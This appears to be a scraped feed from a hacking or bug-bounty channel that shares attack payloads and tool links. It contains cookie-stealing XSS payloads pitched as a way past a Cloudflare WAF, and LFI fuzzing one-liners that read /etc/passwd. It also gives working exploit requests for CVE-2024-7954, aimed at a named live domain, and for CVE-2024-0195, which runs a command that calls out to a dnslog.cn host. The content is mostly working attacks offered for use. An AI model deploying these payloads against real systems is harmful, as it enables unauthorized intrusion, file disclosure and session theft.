❤4👏4🤣3👍1💩1
haxshadow
https://youtu.be/EUBhZOFAcxA
XSS Payload
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><img src=x onerror=confirm(document.cookie)>
<sVg/onLy=1 onLoaD=confirm(1)//
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><img src=x onerror=confirm(document.cookie)>
<sVg/onLy=1 onLoaD=confirm(1)//
try this amazingg xss scanner made by our brother sarper its so fast bcz of new method it can scan 1k urls in just 5-20 sec with 99% success rate it scan urls with xss polyglots payloads and run on all urls parameters just put all urls in wordlist file ones you get hit just open that link directly and xss popup show ❤️
https://github.com/sarperavci/MXS
https://github.com/sarperavci/MXS
👍2❤1
try this tool to find broken linkHijacking thanx to nafeed to sharing me https://github.com/H4cker-Nafeed/Nafeed-Broken-Link
GitHub
GitHub - H4cker-Nafeed/Nafeed-Broken-Link: Nafeed-Broken-Link: A Python tool designed to check for broken social media links on…
Nafeed-Broken-Link: A Python tool designed to check for broken social media links on a given domain. This script crawls all accessible pages of a specified domain and identifies social media links,...
👍1
try this xss pollyglots to bypass waf it will sure help you just use it manully+oneliner commands https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
GitHub
Unleashing an Ultimate XSS Polyglot
A container repository for my public web hacks! Contribute to 0xSobky/HackVault development by creating an account on GitHub.
👍1
try this amazingg auto scanner made by our brother..
https://github.com/wapiti-scanner/wapiti
https://github.com/wapiti-scanner/wapiti
try this amazingg LFI oneliner its veryfast and effective also change ffuf useragent so its dont get blocked by waf's
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | tee testphp.vulnweb.com.lfi.txt
cat testphp.vulnweb.com.lfi.txt | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | tee testphp.vulnweb.com.lfi.txt
cat testphp.vulnweb.com.lfi.txt | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
👍3
remote code execution | CVE-2024-7954 | bug-bounty poc
https://youtu.be/P9QxmY1gS3g?si=ECP1ACaUu8bUbCbA
https://youtu.be/P9QxmY1gS3g?si=ECP1ACaUu8bUbCbA
YouTube
remote code execution | CVE-2024-7954 | bug bounty poc
#bugbountypoc #rce
CVE-2024-7954 | remote code execution | bug-bounty poc
// Disclaimer //
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing…
CVE-2024-7954 | remote code execution | bug-bounty poc
// Disclaimer //
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing…
👍2
CVE-2024-7954.yaml
1.7 KB
POST /index.php?action=porte_plume_previsu HTTP/2
Host: 3fpt.sn
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
Host: 3fpt.sn
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
Remote Code Execution Exploit in Spider-Flow | CVE-2024-0195 POC
https://youtu.be/2Gc67f-h8Kg?si=zf33MWWak6ygAejs
https://youtu.be/2Gc67f-h8Kg?si=zf33MWWak6ygAejs
YouTube
Remote Code Execution (RCE) in "Spider-Flow" || POC CVE-2024-0195
#bugbountytips #pentester #livetarget
⚠️ // Disclaimer // ⚠️
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing & bug hunting so that we can…
⚠️ // Disclaimer // ⚠️
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing & bug hunting so that we can…
CVE-2024-0195.yaml
2.1 KB
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
👍1
🚨 𝗖𝗿𝗶𝘁𝗶𝗰𝗮𝗹 Command Injection (𝐂𝐕𝐄-𝟐𝟎𝟐𝟒-𝟏𝟐𝟏𝟐) Vulnerability Explained | Exploit Breakdown 🔥
https://youtu.be/H1v9nzQQOHA?si=ot33b1YgjvKvMgkc
https://youtu.be/H1v9nzQQOHA?si=ot33b1YgjvKvMgkc
YouTube
🚨 𝗖𝗿𝗶𝘁𝗶𝗰𝗮𝗹 Command Injection (𝐂𝐕𝐄-𝟐𝟎𝟐𝟒-𝟏𝟐𝟏𝟐) Vulnerability Explained | Exploit Breakdown 🔥
In this video, we dive deep into the CVE-2024-1212 vulnerability, a critical command injection flaw that has serious implications for system security. Learn how attackers can exploit this vulnerability, the potential impact on affected systems, and most importantly…